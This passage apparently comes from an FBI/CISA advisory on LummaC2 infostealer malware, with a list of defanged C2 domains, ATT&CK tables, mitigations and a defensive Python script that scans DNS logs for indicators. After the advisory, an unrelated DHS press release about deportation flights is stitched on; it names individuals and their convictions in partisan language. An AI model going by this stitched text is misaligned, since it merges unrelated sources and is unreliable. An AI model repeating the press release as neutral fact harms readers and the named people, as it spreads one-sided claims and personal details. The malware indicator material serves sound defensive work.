  • reinforcenh[.]shop
  • reliabledmwqj[.]shop
  • Musclefarelongea[.]pw
  • Forbidstow[.]site
  • gutterydhowi[.]shop
  • Fanlumpactiras[.]pw
  • Computeryrati[.]site
  • Contemteny[.]site
  • Ownerbuffersuperw[.]pw
  • Seallysl[.]site
  • Dilemmadu[.]site
  • Freckletropsao[.]pw
  • Opposezmny[.]site
  • Faulteyotk[.]site
  • Hemispheredodnkkl[.]pw
  • Goalyfeastz[.]site
  • Authorizev[.]site
  • ghostreedmnu[.]shop
  • Servicedny[.]site
  • blast-hubs[.]com
  • offensivedzvju[.]shop
  • friendseforever[.]help
  • blastikcn[.]com
  • vozmeatillu[.]shop
  • shiningrstars[.]help
  • penetratebatt[.]pw
  • drawzhotdog[.]shop
  • mercharena[.]biz
  • pasteflawwed[.]world
  • generalmills[.]pro
  • citywand[.]live
  • hoyoverse[.]blog
  • nestlecompany[.]pro
  • esccapewz[.]run
  • dsfljsdfjewf[.]info
  • naturewsounds[.]help
  • travewlio[.]shop
  • decreaserid[.]world
  • stormlegue[.]com
  • touvrlane[.]bet
  • governoagoal[.]pw
  • paleboreei[.]biz
  • calmingtefxtures[.]run
  • foresctwhispers[.]top
  • tracnquilforest[.]life
  • sighbtseeing[.]shop
  • advennture[.]top
  • collapimga[.]fun
  • holidamyup[.]today
  • pepperiop[.]digital
  • seizedsentec[.]online
  • triplooqp[.]world
  • easyfwdr[.]digital
  • strawpeasaen[.]fun
  • xayfarer[.]live
  • jrxsafer[.]top
  • quietswtreams[.]life
  • oreheatq[.]live
  • plantainklj[.]run
  • starrynsightsky[.]icu
  • castmaxw[.]run
  • puerrogfh[.]live
  • earthsymphzony[.]today
  • weldorae[.]digital
  • quavabvc[.]top
  • citydisco[.]bet
  • steelixr[.]live
  • furthert[.]run
  • featureccus[.]shop
  • smeltingt[.]run
  • targett[.]top
  • mrodularmall[.]top
  • ferromny[.]digital
  • ywmedici[.]top
  • jowinjoinery[.]icu
  • rodformi[.]run
  • legenassedk[.]top
  • htardwarehu[.]icu
  • metalsyo[.]digital
  • ironloxp[.]live
  • cjlaspcorne[.]icu
  • navstarx[.]shop
  • bugildbett[.]top
  • latchclan[.]shop
  • spacedbv[.]world
  • starcloc[.]bet
  • rambutanvcx[.]run
  • galxnetb[.]today
  • pomelohgj[.]top
  • scenarisacri[.]top
  • jawdedmirror[.]run
  • changeaie[.]top
  • lonfgshadow[.]live
  • liftally[.]top
  • nighetwhisper[.]top
  • salaccgfa[.]top
  • zestmodp[.]top
  • owlflright[.]digital
  • clarmodq[.]top
  • piratetwrath[.]run
  • hemispherexz[.]top
  • quilltayle[.]live
  • equatorf[.]run
  • latitudert[.]live
  • longitudde[.]digital
  • climatologfy[.]top
  • starofliught[.]top

MITRE ATT&CK Tactics and Techniques

See Table 8 through Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 8. Initial Access

| Technique Title | ID | Use |
|---|---|---|
| Phishing | T1566 | Threat actors delivered LummaC2 malware through phishing emails. |
| Phishing: Spearphishing Attachment | T1566.001 | Threat actors used spearphishing attachments to deploy LummaC2 malware payloads. |
| Phishing: Spearphishing Link | T1566.002 | Threat actors used spearphishing hyperlinks to deploy LummaC2 malware payloads. |

Table 9. Defense Evasion

| Technique Title | ID | Use |
|---|---|---|
| Obfuscated Files or Information | T1027 | Threat actors obfuscated the malware to bypass standard cybersecurity measures designed to flag common phishing attempts or drive-by downloads. |
| Masquerading | T1036 | Threat actors delivered LummaC2 malware via spoofed software. |
| Deobfuscate/Decode Files or Information | T1140 | Threat actors used LummaC2 malware to decrypt its callback C2 domains. |

Table 10. Discovery

| Technique Title | ID | Use |
|---|---|---|
| Query Registry | T1012 | Threat actors used LummaC2 malware to query the user’s name and computer name utilizing the APIs GetUserNameW and GetComputerNameW. |
| Browser Information Discovery | T1217 | Threat actors used LummaC2 malware to steal browser data. |

Table 11. Collection

| Technique Title | ID | Use |
|---|---|---|
| Automated Collection | T1119 | LummaC2 malware has automated collection of various information, including cryptocurrency wallet details. |

Table 12. Command and Control

| Technique Title | ID | Use |
|---|---|---|
| Application Layer Protocol: Web Protocols | T1071.001 | Threat actors used LummaC2 malware to attempt POST requests. |
| Ingress Tool Transfer | T1105 | Threat actors used LummaC2 malware to transfer a remote file to compromised systems. |

Table 13. Exfiltration

| Technique Title | ID | Use |
|---|---|---|
| Exfiltration | TA0010 | Threat actors used LummaC2 malware to exfiltrate sensitive user information, including traditional credentials, cryptocurrency wallets, browser extensions, and MFA details without immediate detection. |
| Native API | T1106 | Threat actors used LummaC2 malware to download files with native OS APIs. |

Mitigations

The FBI and CISA recommend organizations implement the mitigations below to reduce the risk of compromise by LummaC2 malware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections. These mitigations apply to all critical infrastructure organizations.

  • Separate User and Privileged Accounts: Allow only necessary users and applications access to the registry [CPG 2.E].
  • Monitor and detect suspicious behavior during exploitation [CPG 3.A].
    • Monitor and detect suspicious behavior, creation and termination events, and unusual and unexpected processes running.
    • Monitor API calls that may attempt to retrieve system information.
    • Analyze behavior patterns from process activities to identify anomalies.
    • For more information, visit CISA’s guidance on: Enhanced Visibility and Hardening Guidance for Communications Infrastructure.
  • Implement application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
  • Protect against threat actor phishing campaigns by implementing CISA’s Phishing Guidance and phishing-resistant multifactor authentication [CPG 2.H].
  • Log Collection: Regularly monitoring and reviewing registry changes and access logs can support detection of LummaC2 malware [CPG 2.T].
  • Implement authentication, authorization, and accounting (AAA) systems [M1018] to limit actions users can perform and review logs of user actions to detect unauthorized use and abuse. Apply principles of least privilege to user accounts and groups, allowing only the performance of authorized actions.
  • Audit user accounts and revoke credentials for departing employees, removing those that are inactive or unnecessary on a routine basis [CPG 2.D]. Limit the ability for user accounts to create additional accounts.
  • Keep systems up to date with regular updates, patches, hotfixes, and service packs that may minimize vulnerabilities. Learn more by visiting CISA’s webpage: Secure Our World: Update Software.
  • Secure network devices to restrict command line access.
  • Use segmentation to prevent access to sensitive systems and information, possibly with the use of Demilitarized Zone (DMZ) or virtual private cloud (VPC) instances to isolate systems [CPG 2.F].
  • Monitor and detect API usage, looking for unusual or malicious behavior.
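The log collection and monitoring mitigations above become concrete once the advisory’s defanged C2 domains (written with “[.]”) are refanged and checked against resolver logs. The following Python is an added example, not code from the advisory or from CISA/FBI; the indicator values and dnsmasq-style log lines are constructed placeholders, not real LummaC2 infrastructure or telemetry.

```python
import re
from typing import Iterable, Optional

# Constructed placeholders in the advisory's defanged "[.]" style, not real LummaC2 hosts.
DEFANGED_IOCS = [
    "example-c2-one[.]top",
    "Example-C2-Two[.]Live",
    "hxxps://example-c2-three[.]run/api",  # URL form: keep the host only
]

# Constructed dnsmasq-style resolver log lines (not real telemetry).
SAMPLE_DNS_LOG = """\
May 21 10:01:02 resolver dnsmasq[812]: query[A] www.example.com from 10.0.0.5
May 21 10:01:09 resolver dnsmasq[812]: query[A] example-c2-one.top from 10.0.0.7
May 21 10:01:15 resolver dnsmasq[812]: query[A] cdn.example-c2-two.live from 10.0.0.9
May 21 10:01:21 resolver dnsmasq[812]: query[A] notexample-c2-one.top from 10.0.0.5
"""

def refang(indicator: str) -> str:
    """Turn a defanged indicator into a lowercase bare hostname."""
    s = indicator.strip().lower().replace("[.]", ".")
    s = re.sub(r"^h(?:xx|tt)ps?://", "", s)  # drop hxxp(s):// or http(s)://
    s = s.split("/", 1)[0].split(":", 1)[0]  # drop any URL path and port
    return s.rstrip(".")

def matches_ioc(qname: str, iocs: frozenset) -> Optional[str]:
    """Return the indicator that qname equals or is a subdomain of, else None."""
    labels = qname.lower().rstrip(".").split(".")
    # cdn.<ioc> matches <ioc>; notexample-c2-one.top (a prefix, not a label) does not.
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in iocs:
            return candidate
    return None

QUERY_RE = re.compile(r"query\[[A-Z]+\] (\S+) from (\S+)")

def scan_dns_log(log_text: str, defanged: Iterable[str]) -> list:
    """Return (client_ip, matched_ioc) for each query that hits an indicator."""
    iocs = frozenset(refang(d) for d in defanged)
    hits = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m and (ioc := matches_ioc(m.group(1), iocs)):
            hits.append((m.group(2), ioc))
    return hits

if __name__ == "__main__":
    for client, ioc in scan_dns_log(SAMPLE_DNS_LOG, DEFANGED_IOCS):
        print(f"{client} resolved C2 indicator {ioc}")
```

Label-wise matching is deliberate: a blocklist keyed on exact strings misses `cdn.<domain>` while a substring match would flag unrelated names that merely contain an indicator.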

Validate Security Controls

In addition to applying mitigations, the FBI and CISA recommend exercising, testing, and validating your organization’s security program against threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. The FBI and CISA recommend testing your existing security controls inventory to assess performance against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 8 through Table 13).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Reporting

Your organization has no obligation to respond or provide information to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.

The FBI is interested in any information that can be shared, to include the status and scope of infection, estimated loss, date of infection, date detected, initial attack vector, and host- and network-based indicators.

To report information, please contact the FBI’s Internet Crime Complaint Center (IC3), your local FBI field office, or CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. The FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favor by the FBI and CISA.

Acknowledgements

ReliaQuest contributed to this advisory.

Version History

May 21, 2025: Initial version.

DHS Sets the Record Straight on Media Frenzy over Deportation Flights for Worst of the Worst Including Murderers, Rapists, and Pedophiles

Source: US Department of Homeland Security

President Trump and Secretary Noem are working every day to get vicious criminals out of our country while activist judges are fighting to bring them back onto American soil

WASHINGTON – The Department of Homeland Security today hosted a press conference to set the record straight and to address the media’s misleading reporting on migrant flights to South Sudan. DHS conducted a deportation flight from Texas to remove some of the most barbaric, violent individuals illegally in the United States. Now a federal judge in Massachusetts is trying to force the United States to bring these criminals back.

“We are removing these convicted criminals from American soil so they can never hurt another American victim. It is absurd that an activist judge is trying to force the United States to bring back these uniquely barbaric monsters who present a clear and present threat to the safety of the American people,” said Assistant Secretary Tricia McLaughlin. “We have given the media the names of these monsters. I implore the media to stop doing the bidding of these criminals and to tell the stories of innocent Americans who have been victimized.”

Below are the individuals ICE removed from American communities.

Enrique ARIAS-Hierro, a Cuban national, was arrested by ICE on May 2, 2025. His criminal history includes convictions for homicide, armed robbery, false impersonation of official, kidnapping, robbery strong arm.

On April 30, 2025, ICE arrested Cuban national Jose Manuel RODRIGUEZ-QUINONES. He has been convicted of attempted first-degree murder with a weapon, battery and larceny, and canine possession and trafficking.

Thongxay NILAKOUT, a citizen of Laos, was arrested by ICE on January 26, 2025. NILAKOUT is convicted of first-degree murder and robbery; sentenced to life confinement.

On May 12, 2025, ICE arrested Mexican national Jesus MUNOZ-Gutierrez. He is convicted of second-degree murder; sentenced to life confinement.

Dian Peter DOMACH, a citizen of South Sudan, was arrested by ICE on May 8, 2024. DOMACH is convicted of robbery and possession of a firearm, of possession of burglar’s tools and possession of defaced firearm and driving under the influence.

Kyaw MYA, a citizen of Burma, was arrested by ICE on February 18, 2025. MYA is convicted of Lascivious Acts with a Child-Victim less than 12 years of age; sentenced to 10 years confinement, paroled after 4 years.

Nyo MYINT, a citizen of Burma, was arrested by ICE on February 19, 2025. MYINT is convicted of first-degree sexual assault involving a victim mentally and physically incapable of resisting; sentenced to 12 years confinement. MYINT is also charged with aggravated assault-nonfamily strongarm.

On May 3, 2025, ICE arrested Tuan Thanh PHAN, a Vietnamese national. PHAN is convicted of first-degree murder and second-degree assault; sentenced to 22 years confinement.

###